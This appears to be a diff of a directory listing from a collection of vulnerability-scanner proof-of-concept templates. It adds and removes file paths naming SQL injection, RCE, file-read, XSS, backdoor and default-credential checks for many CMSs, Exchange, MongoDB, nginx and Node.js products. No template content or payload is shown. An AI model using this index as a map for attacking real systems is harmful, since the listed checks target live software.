./poc/microsoft/duomicms-sql-injection-7125.yaml +./poc/microsoft/duomicms-sql-injection.yaml ./poc/microsoft/duomicms-sqli.yaml ./poc/microsoft/duomicms-sqli.yml ./poc/microsoft/duomicms-workflow.yaml @@ -50528,10 +50503,8 @@ ./poc/microsoft/emails-blacklist-everest-forms-6477bf18cad6c823db485408d49b337b.yaml ./poc/microsoft/emails-blacklist-everest-forms-ee9870d5bef0545dced6af21473d9057.yaml ./poc/microsoft/emails-blacklist-everest-forms.yaml +./poc/microsoft/empirecms-xss-7218.yaml ./poc/microsoft/empirecms-xss-7219.yaml -./poc/microsoft/empirecms-xss-7220.yaml -./poc/microsoft/empirecms-xss.yaml -./poc/microsoft/ems-login-panel-7223.yaml ./poc/microsoft/ems-login-panel-7224.yaml ./poc/microsoft/ems-login-panel-7225.yaml ./poc/microsoft/ems-login-panel.yaml @@ -50555,7 +50528,6 @@ ./poc/microsoft/feifeicms-lfr-7463.yaml ./poc/microsoft/feifeicms-lfr-7464.yaml ./poc/microsoft/feifeicms-lfr-7465.yaml -./poc/microsoft/feifeicms-lfr.yaml ./poc/microsoft/feifeicms-lfr.yml ./poc/microsoft/feifeicms-workflow.yaml ./poc/microsoft/feifeicms.yaml @@ -50674,7 +50646,6 @@ ./poc/microsoft/grav-cms-detect-7841.yaml ./poc/microsoft/grav-cms-detect-7842.yaml ./poc/microsoft/grav-cms-detect-7845.yaml -./poc/microsoft/grav-cms-detect.yaml ./poc/microsoft/gravcms.yaml ./poc/microsoft/gravity-forms-dps-pxpay-dc6fdd47b30188fa018518ba346c5e82.yaml ./poc/microsoft/gravity-forms-dps-pxpay.yaml @@ -50776,6 +50747,7 @@ ./poc/microsoft/integration-for-szamlazz-hu-gravity-forms-24a382814c11d242eafc70c9603f2da8.yaml ./poc/microsoft/integration-for-szamlazz-hu-gravity-forms.yaml ./poc/microsoft/ipec-ipms.yaml +./poc/microsoft/isams-panel.yaml ./poc/microsoft/jcms-panel.yaml ./poc/microsoft/jeecms.yaml ./poc/microsoft/jeewms-dynamicDataSourceController-rce.yaml @@ -50785,7 +50757,6 @@ ./poc/microsoft/jeewms-lfi-8253.yaml ./poc/microsoft/jeewms-lfi-8254.yaml ./poc/microsoft/jeewms-lfi-8255.yaml -./poc/microsoft/jeewms-lfi.yaml ./poc/microsoft/jeewms-privilege-bypass.yaml ./poc/microsoft/jeewms-showordownbyurl-fileread.yaml ./poc/microsoft/jeewms-showordownbyurl-fileread.yml @@ -50818,7 +50789,6 @@ ./poc/microsoft/kevinlab-bems-backdoor-8454.yaml ./poc/microsoft/kevinlab-bems-backdoor-8455.yaml ./poc/microsoft/kevinlab-bems-backdoor-8456.yaml -./poc/microsoft/kevinlab-bems-sqli-8457.yaml ./poc/microsoft/kevinlab-bems-sqli-8458.yaml ./poc/microsoft/kevinlab-bems-sqli-8459.yaml ./poc/microsoft/kevinlab-bems-sqli-8460.yaml @@ -50826,7 +50796,6 @@ ./poc/microsoft/kevinlab-hems-backdoor-8464.yaml ./poc/microsoft/kevinlab-hems-backdoor-8465.yaml ./poc/microsoft/kevinlab-hems-backdoor-8466.yaml -./poc/microsoft/kevinlab-hems-backdoor-8467.yaml ./poc/microsoft/kiwitcms-json-rpc.yaml ./poc/microsoft/kiwitcms-login-8496.yaml ./poc/microsoft/kiwitcms-login.yaml @@ -50862,8 +50831,8 @@ ./poc/microsoft/lotus-core-cms-lfi.yaml ./poc/microsoft/lotuscms-rce-1.yaml ./poc/microsoft/lotuscms-rce-2.yaml -./poc/microsoft/lotuscms-rce-8650.yaml ./poc/microsoft/lotuscms-rce-8651.yaml +./poc/microsoft/lotuscms-rce-8652.yaml ./poc/microsoft/lotuscms-rce-8653.yaml ./poc/microsoft/lws-sms-c00e7e76d8a521ccca85015413c6ff0e.yaml ./poc/microsoft/lws-sms-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -50920,7 +50889,6 @@ ./poc/microsoft/menu-items-visibility-control-c141390b43c3b91c671992707f60ed21.yaml ./poc/microsoft/menu-items-visibility-control.yaml ./poc/microsoft/metatag-cms-8832.yaml -./poc/microsoft/metatag-cms-8833.yaml ./poc/microsoft/microsoft-advertising-universal-event-tracking-uet-f6e4d845703be6cb9b81a808ad73176e.yaml ./poc/microsoft/microsoft-advertising-universal-event-tracking-uet.yaml ./poc/microsoft/microsoft-azure-error.yaml @@ -50936,8 +50904,10 @@ ./poc/microsoft/microsoft-exchange-panel-8850.yaml ./poc/microsoft/microsoft-exchange-panel.yaml ./poc/microsoft/microsoft-exchange-server-detect-8852.yaml +./poc/microsoft/microsoft-exchange-server-detect-8853.yaml +./poc/microsoft/microsoft-exchange-server-detect-8854.yaml ./poc/microsoft/microsoft-exchange-server-detect.yaml -./poc/microsoft/microsoft-exchange-workflow-8855.yaml +./poc/microsoft/microsoft-exchange-workflow.yaml ./poc/microsoft/microsoft-exchange.yaml ./poc/microsoft/microsoft-ftp-service-detect.yaml ./poc/microsoft/microsoft-ftp-service.yaml @@ -50961,7 +50931,7 @@ ./poc/microsoft/mollie-forms-f0db812e51ae6400a634ecab5f82571a.yaml ./poc/microsoft/mollie-forms.yaml ./poc/microsoft/monstracms-detect.yaml -./poc/microsoft/ms-adcs-detect-8960.yaml +./poc/microsoft/ms-adcs-detect-8961.yaml ./poc/microsoft/ms-adcs-detect.yaml ./poc/microsoft/ms-exchange-server-reflected-xss-8962.yaml ./poc/microsoft/ms-exchange-server-reflected-xss-8963.yaml @@ -50991,6 +50961,7 @@ ./poc/microsoft/msmc-redirect-after-comment.yaml ./poc/microsoft/msmq-detect.yaml ./poc/microsoft/msmtp-config-8966.yaml +./poc/microsoft/msmtp-config-8967.yaml ./poc/microsoft/mspcontrol-login.yaml ./poc/microsoft/mssql-default-logins.yaml ./poc/microsoft/mssql-detect.yaml @@ -51031,17 +51002,15 @@ ./poc/microsoft/myfactory-fms-xss.yaml ./poc/microsoft/myucms-lfr-8983.yaml ./poc/microsoft/myucms-lfr-8984.yaml -./poc/microsoft/myucms-lfr-8985.yaml ./poc/microsoft/myucms-lfr-8986.yaml -./poc/microsoft/myucms-lfr-8987.yaml ./poc/microsoft/myucms-lfr.yml ./poc/microsoft/namaste-lms-119ec46f108a332aca6034c537083044.yaml ./poc/microsoft/namaste-lms-5a9d5217f7143833c2e6879ff9d010b1.yaml ./poc/microsoft/namaste-lms-9482e96ff87b6b144e3214e2145ccbb5.yaml ./poc/microsoft/namaste-lms-f3dd353da7150ac371daba104daa37d4.yaml ./poc/microsoft/namaste-lms.yaml -./poc/microsoft/netlify-cms-9039.yaml ./poc/microsoft/netlify-cms-9040.yaml +./poc/microsoft/netlify-cms-9041.yaml ./poc/microsoft/netlify-cms.yaml ./poc/microsoft/nex-forms-8ae2cf1fb5917fff39746f64c8df93f8.yaml ./poc/microsoft/nex-forms-express-wp-form-builder-03800489aeb5ec718d025ca048ebef5f.yaml @@ -51157,13 +51126,13 @@ ./poc/microsoft/nitc-cms.yaml ./poc/microsoft/normstar-hr.yaml ./poc/microsoft/nucleus-cms.yaml -./poc/microsoft/octobercms-default-login-9192.yaml ./poc/microsoft/octobercms-default-login-9193.yaml +./poc/microsoft/octobercms-default-login.yaml ./poc/microsoft/octobercms-detect-1.yaml ./poc/microsoft/octobercms-detect-2.yaml ./poc/microsoft/octobercms-detect-9194.yaml -./poc/microsoft/octobercms-detect-9195.yaml ./poc/microsoft/octobercms-detect-9196.yaml +./poc/microsoft/odoo-cms-redirect-9199.yaml ./poc/microsoft/odoo-cms-redirect-9200.yaml ./poc/microsoft/odoo-cms-redirect-9201.yaml ./poc/microsoft/official-mailerlite-sign-up-forms-2cfff66bdd973664a4a41739a9cfd162.yaml @@ -51190,14 +51159,15 @@ ./poc/microsoft/optin-forms.yaml ./poc/microsoft/orchid-vms-panel.yaml ./poc/microsoft/outsystems-servicecenter-panel.yaml -./poc/microsoft/pandora-fms-console-9451.yaml ./poc/microsoft/pandora-fms-console-9452.yaml +./poc/microsoft/pandora-fms-console-9453.yaml ./poc/microsoft/pandora-fms-console.yaml ./poc/microsoft/pandora-fms.yaml ./poc/microsoft/pandorafms-cve-2019-20224-rce.yml ./poc/microsoft/paraview-uams.yaml ./poc/microsoft/payment-forms-for-paystack-9e71ae11056f9c8a0f3c1bdcd525390c.yaml ./poc/microsoft/payment-forms-for-paystack.yaml +./poc/microsoft/pbootcms-database-file-download-9469.yaml ./poc/microsoft/pbootcms-database-file-download.yaml ./poc/microsoft/pbootcms-database-file-download.yml ./poc/microsoft/pbootcms-v3.1.2-rce.yaml @@ -51235,15 +51205,16 @@ ./poc/microsoft/planso-forms.yaml ./poc/microsoft/plone-cms-detect-9605.yaml ./poc/microsoft/plone-cms-detect-9606.yaml -./poc/microsoft/plone-cms-detect-9607.yaml +./poc/microsoft/plone-cms-detect-9608.yaml ./poc/microsoft/plone-cms-detect-9609.yaml -./poc/microsoft/plone-cms-detect.yaml ./poc/microsoft/power-cpms.yaml ./poc/microsoft/power-powerpms.yaml ./poc/microsoft/powercreator-cms-rce-9643.yaml ./poc/microsoft/powercreator-cms-rce-9644.yaml +./poc/microsoft/powercreator-cms-rce-9645.yaml ./poc/microsoft/powercreator-cms-rce-9646.yaml ./poc/microsoft/powercreator-cms-rce-9647.yaml +./poc/microsoft/powercreator-cms-rce.yaml ./poc/microsoft/powercreator-cms.yaml ./poc/microsoft/preamsolutions-inspection-and-modification-information-platform.yaml ./poc/microsoft/pro-chat-rooms.yaml @@ -51251,6 +51222,7 @@ ./poc/microsoft/qibocms-file-download.yaml ./poc/microsoft/qibocms-sqli.yaml ./poc/microsoft/qibocms-sqli.yml +./poc/microsoft/quick-cms-sqli.yaml ./poc/microsoft/quillforms-63ad11895eca4790d2308fe1895cd383.yaml ./poc/microsoft/quillforms-9a105b65f01831a6b723e0cb2ab1f154.yaml ./poc/microsoft/quillforms.yaml @@ -51260,13 +51232,14 @@ ./poc/microsoft/reflected-params.yaml ./poc/microsoft/rhymix-cms-detect-9876.yaml ./poc/microsoft/rhymix-cms-detect-9877.yaml +./poc/microsoft/rhymix-cms-detect-9878.yaml ./poc/microsoft/rhymix-cms-detect-9879.yaml ./poc/microsoft/rubygems-key.yaml ./poc/microsoft/ruoyi-cms-unauth.yaml ./poc/microsoft/s-cms.yaml ./poc/microsoft/saferoads-vms-login-9970.yaml -./poc/microsoft/saferoads-vms-login-9971.yaml ./poc/microsoft/saferoads-vms-login-9972.yaml +./poc/microsoft/saferoads-vms-login-9973.yaml ./poc/microsoft/saferoads-vms-login-9974.yaml ./poc/microsoft/saferoads-vms-login.yaml ./poc/microsoft/samsung-phish.yaml @@ -51278,12 +51251,12 @@ ./poc/microsoft/samsung-wea453e-rce.yml ./poc/microsoft/samsung-wlan-ap-default-credentials-9996.yaml ./poc/microsoft/samsung-wlan-ap-default-credentials.yaml +./poc/microsoft/samsung-wlan-ap-lfi-10000.yaml ./poc/microsoft/samsung-wlan-ap-lfi-10001.yaml ./poc/microsoft/samsung-wlan-ap-lfi-10002.yaml ./poc/microsoft/samsung-wlan-ap-lfi-10003.yaml ./poc/microsoft/samsung-wlan-ap-lfi-9997.yaml ./poc/microsoft/samsung-wlan-ap-lfi-9998.yaml -./poc/microsoft/samsung-wlan-ap-lfi-9999.yaml ./poc/microsoft/samsung-wlan-ap-rce-10004.yaml ./poc/microsoft/samsung-wlan-ap-rce-10005.yaml ./poc/microsoft/samsung-wlan-ap-rce-10006.yaml @@ -51294,12 +51267,13 @@ ./poc/microsoft/samsung-wlan-ap-wea453e-rce.yaml ./poc/microsoft/samsung-wlan-ap-wea453e-rce.yml ./poc/microsoft/samsung-wlan-ap-workflow-10011.yaml +./poc/microsoft/samsung-wlan-ap-xss-10012.yaml ./poc/microsoft/samsung-wlan-ap-xss-10013.yaml ./poc/microsoft/samsung-wlan-ap-xss-10014.yaml -./poc/microsoft/samsung-wlan-ap-xss.yaml ./poc/microsoft/samsung-wlan-default-login-10015.yaml ./poc/microsoft/samsung-wlan-default-login-10016.yaml ./poc/microsoft/samsung-wlan-default-login-10017.yaml +./poc/microsoft/samsung-wlan-default-login-10018.yaml ./poc/microsoft/sanshuichinatelecombusinesssupportroomsystem.yaml ./poc/microsoft/sdcms神盾内容管理系统.yaml ./poc/microsoft/seaCMS-sqli.yaml @@ -51307,9 +51281,11 @@ ./poc/microsoft/seacms-before-v992-rce.yml ./poc/microsoft/seacms-dmku-sqli.yaml ./poc/microsoft/seacms-rce-10100.yaml +./poc/microsoft/seacms-rce-10101.yaml ./poc/microsoft/seacms-rce-10102.yaml ./poc/microsoft/seacms-rce.yml ./poc/microsoft/seacms-sqli(1).yaml +./poc/microsoft/seacms-sqli-10103.yaml ./poc/microsoft/seacms-sqli.yml ./poc/microsoft/seacms-v101v11-comment-api-sqli.yaml ./poc/microsoft/seacms-v654-rce.yaml @@ -51326,6 +51302,7 @@ ./poc/microsoft/seeddms-default-password.yaml ./poc/microsoft/seeddms-detect-10129.yaml ./poc/microsoft/seeddms-detect-10130.yaml +./poc/microsoft/seeddms-detect-10131.yaml ./poc/microsoft/seeddms-detect.yaml ./poc/microsoft/seeddms-panel.yaml ./poc/microsoft/self-contained-with-params.yaml @@ -51333,7 +51310,6 @@ ./poc/microsoft/sensei-lms-85a373e82ccc10a34f197c7718aea84b.yaml ./poc/microsoft/sensei-lms-c63bf77b4673b1516933ee9dbc12c7ea.yaml ./poc/microsoft/sensei-lms.yaml -./poc/microsoft/sevone-nms-network-manager.yaml ./poc/microsoft/sfwd-lms-06323fb9edeca49ba23c68725457bd17.yaml ./poc/microsoft/sfwd-lms-1330b5fcba1aa18649be523fba98826e.yaml ./poc/microsoft/sfwd-lms-338d1aba9fbf1a2bc39d1d885f9dce3d.yaml @@ -51462,8 +51438,8 @@ ./poc/microsoft/textme-sms-integration.yaml ./poc/microsoft/tiki-wiki-cms.yaml ./poc/microsoft/tikiwiki-cms-1.yaml +./poc/microsoft/tikiwiki-cms-10773.yaml ./poc/microsoft/tikiwiki-cms-10774.yaml -./poc/microsoft/tikiwiki-cms-10775.yaml ./poc/microsoft/tikiwiki-cms-10776.yaml ./poc/microsoft/tikiwiki-cms-2.yaml ./poc/microsoft/tikiwiki-cms.yaml @@ -51471,8 +51447,8 @@ ./poc/microsoft/tinychat-roomspy.yaml ./poc/microsoft/tomatocms.yaml ./poc/microsoft/top-xss-params-10806.yaml +./poc/microsoft/top-xss-params-10807.yaml ./poc/microsoft/top-xss-params-10808.yaml -./poc/microsoft/top-xss-params-10809.yaml ./poc/microsoft/top-xss-params.yaml ./poc/microsoft/topper-nms.yaml ./poc/microsoft/torro-forms-32b2e2ff95bce6c610720879796f4bca.yaml @@ -51497,8 +51473,8 @@ ./poc/microsoft/views-for-wpforms-lite.yaml ./poc/microsoft/vospari-forms-e9bd69dbdf78833ce2843fc07cba7b74.yaml ./poc/microsoft/vospari-forms.yaml +./poc/microsoft/vpms-auth-bypass-11066.yaml ./poc/microsoft/vpms-auth-bypass-11067.yaml -./poc/microsoft/vpms-auth-bypass-11068.yaml ./poc/microsoft/vpms-auth-bypass-11069.yaml ./poc/microsoft/vpms-auth-bypass.yaml ./poc/microsoft/vts-cms.yaml @@ -51513,9 +51489,9 @@ ./poc/microsoft/weforms.yaml ./poc/microsoft/wems-enterprise-xss.yaml ./poc/microsoft/wems-manager-xss-11191.yaml +./poc/microsoft/wems-manager-xss-11192.yaml ./poc/microsoft/wems-manager-xss-11193.yaml ./poc/microsoft/wems-manager-xss-11194.yaml -./poc/microsoft/wems-manager-xss.yaml ./poc/microsoft/whfst-cms.yaml ./poc/microsoft/white-label-cms-1855568f250a52767f45b60ca73feade.yaml ./poc/microsoft/white-label-cms-21f790f886a508204a6d79b9c5155bc7.yaml @@ -51530,12 +51506,13 @@ ./poc/microsoft/white-label-cms-plugin.yaml ./poc/microsoft/white-label-cms.yaml ./poc/microsoft/wondercms-detect-11221.yaml +./poc/microsoft/wondercms-detect-11222.yaml ./poc/microsoft/wondercms-detect-11223.yaml -./poc/microsoft/wondercms-detect.yaml ./poc/microsoft/woocommerce-ninjaforms-product-addons-fe7479a6b6025e86397ca09e26459aa3.yaml ./poc/microsoft/woocommerce-ninjaforms-product-addons.yaml ./poc/microsoft/woosms-sms-module-for-woocommerce-15f567edca2252a2ec556aac3ef868ef.yaml ./poc/microsoft/woosms-sms-module-for-woocommerce.yaml +./poc/microsoft/wp-arforms-listing-11415.yaml ./poc/microsoft/wp-arforms-listing-11416.yaml ./poc/microsoft/wp-arforms-listing-11417.yaml ./poc/microsoft/wp-arforms-listing-11418.yaml @@ -51546,12 +51523,13 @@ ./poc/microsoft/wp-gravity-forms-spreadsheets-ce51e508f7b3ae4fa3cfc0e4f02b85ff.yaml ./poc/microsoft/wp-gravity-forms-spreadsheets-e2b56e01ba06c66b8d53d40581b73ce6.yaml ./poc/microsoft/wp-gravity-forms-spreadsheets.yaml +./poc/microsoft/wp-mstore-plugin-listing-11500.yaml ./poc/microsoft/wp-mstore-plugin-listing-11501.yaml ./poc/microsoft/wp-plugin-lifterlms-11533.yaml ./poc/microsoft/wp-plugin-lifterlms-11534.yaml ./poc/microsoft/wp-plugin-lifterlms-11536.yaml -./poc/microsoft/wp-sfwd-lms-listing-11562.yaml ./poc/microsoft/wp-sfwd-lms-listing-11563.yaml +./poc/microsoft/wp-sfwd-lms-listing-11564.yaml ./poc/microsoft/wp-sfwd-lms-listing-11565.yaml ./poc/microsoft/wp-shamsi-124603a63a010e84e51504af813f16d0.yaml ./poc/microsoft/wp-shamsi-d80212b26727fff04d47601179cd407f.yaml @@ -51656,7 +51634,9 @@ ./poc/microsoft/wq-cms.yaml ./poc/microsoft/wuzhicms-detect-11652.yaml ./poc/microsoft/wuzhicms-detect-11653.yaml +./poc/microsoft/wuzhicms-detect-11654.yaml ./poc/microsoft/wuzhicms-detect-11655.yaml +./poc/microsoft/wuzhicms-detect.yaml ./poc/microsoft/wuzhicms-sqli-11656.yaml ./poc/microsoft/wuzhicms-sqli-11657.yaml ./poc/microsoft/wuzhicms-sqli-11658.yaml @@ -51669,7 +51649,6 @@ ./poc/microsoft/x-forms-express.yaml ./poc/microsoft/xdcms-sql.yaml ./poc/microsoft/xdcms-sql.yml -./poc/microsoft/xdcms-sqli-11664.yaml ./poc/microsoft/xdcms-sqli-11665.yaml ./poc/microsoft/xdcms-sqli-11666.yaml ./poc/microsoft/xdcms-sqli-11667.yaml @@ -51696,7 +51675,6 @@ ./poc/microsoft/yzmcms-detect.yaml ./poc/microsoft/yzmcms-installer.yaml ./poc/microsoft/yzmcms-panel.yaml -./poc/microsoft/zcms-v3-sqli-11773.yaml ./poc/microsoft/zcms-v3-sqli-11774.yaml ./poc/microsoft/zcms-v3-sqli-11775.yaml ./poc/microsoft/zcms-v3-sqli.yaml @@ -51708,8 +51686,8 @@ ./poc/microsoft/zhixiangOA-msglog.aspx-sql.yaml ./poc/microsoft/zhuofansoft-cms.yaml ./poc/microsoft/zms-auth-bypass-11829.yaml +./poc/microsoft/zms-auth-bypass-11830.yaml ./poc/microsoft/zms-auth-bypass-11831.yaml -./poc/microsoft/zms-auth-bypass-11832.yaml ./poc/microsoft/zms-auth-bypass.yaml ./poc/microsoft/zoho-crm-forms-214f15a18793e7b424d313f7d9322ea1.yaml ./poc/microsoft/zoho-crm-forms-2b5679f874f417055036f384b6409e12.yaml @@ -51726,19 +51704,20 @@ ./poc/microsoft/zzzcms-workflow.yaml ./poc/microsoft/zzzcms-xss.yaml ./poc/microsoft/zzzcms.yaml +./poc/mongodb/alibaba-mongoshake-unauth-268.yaml ./poc/mongodb/alibaba-mongoshake-unauth-269.yaml ./poc/mongodb/alibaba-mongoshake-unauth-270.yaml ./poc/mongodb/dionaea-mongodb-honeypot-detection.yaml ./poc/mongodb/mongo-express-cve-2019-10758.yml ./poc/mongodb/mongo-express-web-gui.yaml ./poc/mongodb/mongodb-detect-8919.yaml +./poc/mongodb/mongodb-detect-8920.yaml ./poc/mongodb/mongodb-detect-8921.yaml ./poc/mongodb/mongodb-detect.yaml ./poc/mongodb/mongodb-info-enum.yaml ./poc/mongodb/mongodb-ops-manager-8923.yaml ./poc/mongodb/mongodb-ops-manager-8924.yaml ./poc/mongodb/mongodb-ops-manager.yaml -./poc/mongodb/mongodb-unauth-8925.yaml ./poc/mongodb/mongodb-unauth-8926.yaml ./poc/mongodb/mongodb-unauth-8927.yaml ./poc/mongodb/mongodb-unauth-8928.yaml @@ -51752,13 +51731,13 @@ ./poc/mongodb/robomongo.yaml ./poc/mongodb/rockmongo-default-credentials-9896.yaml ./poc/mongodb/rockmongo-default-credentials.yaml +./poc/mongodb/rockmongo-default-login-9897.yaml ./poc/mongodb/rockmongo-default-login-9898.yaml ./poc/mongodb/rockmongo-default-login-9899.yaml ./poc/mongodb/rockmongo-default-login-9900.yaml ./poc/mongodb/rockmongo-default-password.yaml ./poc/mongodb/rockmongo-default-password.yml ./poc/mongodb/rockmongo-xss-9901.yaml -./poc/mongodb/rockmongo-xss-9902.yaml ./poc/mongodb/rockmongo-xss-9903.yaml ./poc/mongodb/rockmongo-xss-9904.yaml ./poc/mongodb/unauthenticated-mongo-express-1.yaml @@ -51767,6 +51746,7 @@ ./poc/mongodb/unauthenticated-mongo-express-10910.yaml ./poc/mongodb/unauthenticated-mongo-express-10911.yaml ./poc/mongodb/unauthenticated-mongo-express-2.yaml +./poc/mongodb/unauthenticated-mongo-express.yaml ./poc/mysql/EOffice_mysql_config_information_leak.yaml ./poc/mysql/ScanMySQLiErrorBased.yaml ./poc/mysql/create-mysql-detection.yaml @@ -51793,14 +51773,15 @@ ./poc/mysql/seeyon-a6-createmysql-disclosure.yaml ./poc/mysql/seeyon-oa-a6-createmysql-infoleak.yaml ./poc/mysql/unrestricted-sg-ingress-mysql-port.yaml -./poc/netlify/api-netlify-470.yaml -./poc/netlify/netlify-cms-9039.yaml +./poc/netlify/api-netlify.yaml ./poc/netlify/netlify-cms-9040.yaml +./poc/netlify/netlify-cms-9041.yaml ./poc/netlify/netlify-cms.yaml ./poc/netlify/netlify-takeover-9042.yaml ./poc/netlify/netlify-takeover-9043.yaml ./poc/netlify/netlify-takeover.yaml ./poc/nginx/default-nginx-page-6880.yaml +./poc/nginx/default-nginx-page-6881.yaml ./poc/nginx/default-nginx-page-6882.yaml ./poc/nginx/default-nginx-page-6883.yaml ./poc/nginx/git-config-nginxoffbyslash-1.yaml @@ -51810,9 +51791,10 @@ ./poc/nginx/git-config-nginxoffbyslash-5.yaml ./poc/nginx/git-config-nginxoffbyslash-6.yaml ./poc/nginx/git-config-nginxoffbyslash-7.yaml +./poc/nginx/git-config-nginxoffbyslash-7628.yaml ./poc/nginx/git-config-nginxoffbyslash-7629.yaml +./poc/nginx/git-config-nginxoffbyslash-7630.yaml ./poc/nginx/git-config-nginxoffbyslash-7631.yaml -./poc/nginx/git-config-nginxoffbyslash-7632.yaml ./poc/nginx/git-config-nginxoffbyslash-8.yaml ./poc/nginx/git-config-nginxoffbyslash-9.yaml ./poc/nginx/git-config-nginxoffbyslash.yaml @@ -51824,13 +51806,11 @@ ./poc/nginx/nginx-config-9096.yaml ./poc/nginx/nginx-config-9097.yaml ./poc/nginx/nginx-config-9098.yaml +./poc/nginx/nginx-config-9099.yaml ./poc/nginx/nginx-config-exposure.yaml -./poc/nginx/nginx-config.yaml ./poc/nginx/nginx-linux-page-9100.yaml ./poc/nginx/nginx-linux-page-9101.yaml -./poc/nginx/nginx-linux-page-9102.yaml ./poc/nginx/nginx-linux-page-9103.yaml -./poc/nginx/nginx-linux-page.yaml ./poc/nginx/nginx-merge-slashes-path-traversal-1.yaml ./poc/nginx/nginx-merge-slashes-path-traversal-2.yaml ./poc/nginx/nginx-merge-slashes-path-traversal-3.yaml @@ -51856,7 +51836,7 @@ ./poc/nginx/nginx-version-9119.yaml ./poc/nginx/nginx-version-9120.yaml ./poc/nginx/nginx-version-9121.yaml -./poc/nginx/nginx-version-9122.yaml +./poc/nginx/nginx-version-9123.yaml ./poc/nginx/nginx-version.yaml ./poc/nginx/nginx-vhost-traffic-status-9124.yaml ./poc/nginx/nginx-vhost-traffic-status-9125.yaml @@ -51912,9 +51892,6 @@ ./poc/nodejs/grandnode.yaml ./poc/nodejs/ibm-web-traffic-express-caching-proxy.yaml ./poc/nodejs/kube-api-nodes-8507.yaml -./poc/nodejs/kube-api-nodes-8508.yaml -./poc/nodejs/kube-api-nodes.yaml -./poc/nodejs/lfr_express.yaml ./poc/nodejs/mailsite-express.yaml ./poc/nodejs/mailsiteexpress.yaml ./poc/nodejs/mongo-express-cve-2019-10758.yml @@ -51942,11 +51919,12 @@ ./poc/nodejs/nex-forms-express-wp-form-builder-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/nodejs/nex-forms-express-wp-form-builder-plugin.yaml ./poc/nodejs/nex-forms-express-wp-form-builder.yaml +./poc/nodejs/node-ecstatic-listing.yaml ./poc/nodejs/node-env.yaml ./poc/nodejs/node-exporter-metrics-9135.yaml ./poc/nodejs/node-express-dev-env.yaml ./poc/nodejs/node-express-status.yaml -./poc/nodejs/node-integration-enabled-9137.yaml +./poc/nodejs/node-integration-enabled-9136.yaml ./poc/nodejs/node-integration-enabled.yaml ./poc/nodejs/node-nunjucks-ssti.yaml ./poc/nodejs/node-red-dashboard-file-read-cve-2021-3223.yml @@ -51969,7 +51947,7 @@ ./poc/nodejs/optima-express.yaml ./poc/nodejs/pcdn-cache-node.yaml ./poc/nodejs/pnpm-pnpm-lock-yaml.yaml -./poc/nodejs/puppet-node-manager-detect-9720.yaml +./poc/nodejs/puppet-node-manager-detect.yaml ./poc/nodejs/stardot-express.yaml ./poc/nodejs/sun-java-system-calendar-express.yaml ./poc/nodejs/unauthenticated-mongo-express-1.yaml @@ -51978,7 +51956,8 @@ ./poc/nodejs/unauthenticated-mongo-express-10910.yaml ./poc/nodejs/unauthenticated-mongo-express-10911.yaml ./poc/nodejs/unauthenticated-mongo-express-2.yaml -./poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml +./poc/nodejs/unauthenticated-mongo-express.yaml +./poc/nodejs/unauthorized-puppet-node-manager-detect-10958.yaml ./poc/nodejs/unauthorized-puppet-node-manager-detect.yaml ./poc/nodejs/webp-express-1fbe9279dc139e40de171678cc908922.yaml ./poc/nodejs/webp-express-802342a8791d6bf81a3a97aaebbba8bf.yaml @@ -52016,7 +51995,7 @@ ./poc/open_redirect/Url-Redirection-Catcher.yaml ./poc/open_redirect/WBCE CMS 1.6.1 - Open Redirect & CSRF.yaml ./poc/open_redirect/WordPress-Begin_Themes-Redirection.yaml -./poc/open_redirect/age-gate-open-redirect-207.yaml +./poc/open_redirect/age-gate-open-redirect.yaml ./poc/open_redirect/all-404-pages-redirect-to-homepage-cdee863c21664bd13f1b773588ad086d.yaml ./poc/open_redirect/all-404-pages-redirect-to-homepage.yaml ./poc/open_redirect/all-404-redirect-to-homepage-089607c10a667d577534d7f54440d6ac.yaml @@ -52036,8 +52015,8 @@ ./poc/open_redirect/aspnuke-openredirect-557.yaml ./poc/open_redirect/attitude-theme-open-redirect-587.yaml ./poc/open_redirect/attitude-theme-open-redirect-588.yaml -./poc/open_redirect/attitude-theme-open-redirect.yaml ./poc/open_redirect/attitude-wp-theme-open-redirect.yaml +./poc/open_redirect/aws-redirect-651.yaml ./poc/open_redirect/aws-redirect-652.yaml ./poc/open_redirect/aws-redirect-653.yaml ./poc/open_redirect/aws-redirect-654.yaml @@ -52056,7 +52035,6 @@ ./poc/open_redirect/bitrix-open-redirect-8.yaml ./poc/open_redirect/bitrix-open-redirect-9.yaml ./poc/open_redirect/bitrix-open-redirect.yaml -./poc/open_redirect/brandfolder-open-redirect-779.yaml ./poc/open_redirect/brandfolder-open-redirect-780.yaml ./poc/open_redirect/brandfolder-open-redirect-781.yaml ./poc/open_redirect/brandfolder-open-redirect-782.yaml @@ -52086,9 +52064,9 @@ ./poc/open_redirect/drupal_module-pubdlcnt-open-redirect-vulnerability.yaml ./poc/open_redirect/easy-redirect-manager-15a476cd8a1fcf1c6c6e059975b58c8a.yaml ./poc/open_redirect/easy-redirect-manager.yaml +./poc/open_redirect/eatery-restaurant-open-redirect-7158.yaml ./poc/open_redirect/eatery-restaurant-open-redirect-7159.yaml ./poc/open_redirect/eatery-restaurant-open-redirect-7160.yaml -./poc/open_redirect/eatery-restaurant-open-redirect.yaml ./poc/open_redirect/eatery-restaurant-wp-theme-open-redirect.yaml ./poc/open_redirect/edd-conditional-success-redirects-2d0f5856608a10fb29f7e370acc0b71e.yaml ./poc/open_redirect/edd-conditional-success-redirects.yaml @@ -52118,13 +52096,11 @@ ./poc/open_redirect/homeautomation-v3-openredirect-7982.yaml ./poc/open_redirect/homeautomation-v3-openredirect-7983.yaml ./poc/open_redirect/homeautomation-v3-openredirect-7984.yaml -./poc/open_redirect/homeautomation-v3-openredirect-7985.yaml ./poc/open_redirect/homeautomation-v3-openredirect-7986.yaml ./poc/open_redirect/htaccess-redirect-15d8c137823c3b6979566e3d6ce26232.yaml ./poc/open_redirect/htaccess-redirect.yaml ./poc/open_redirect/httpbin-open-redirect-8048.yaml ./poc/open_redirect/httpbin-open-redirect-8049.yaml -./poc/open_redirect/httpbin-open-redirect.yaml ./poc/open_redirect/httpbin-open-redirect.yml ./poc/open_redirect/https-to-http-redirect.yaml ./poc/open_redirect/icewarp-openredirects.yaml @@ -52145,6 +52121,7 @@ ./poc/open_redirect/msmc-redirect-after-comment.yaml ./poc/open_redirect/multiple-parameters-openredirect.yaml ./poc/open_redirect/music-store-open-redirect-8972.yaml +./poc/open_redirect/music-store-open-redirect.yaml ./poc/open_redirect/netsweeper-open-redirect-9063.yaml 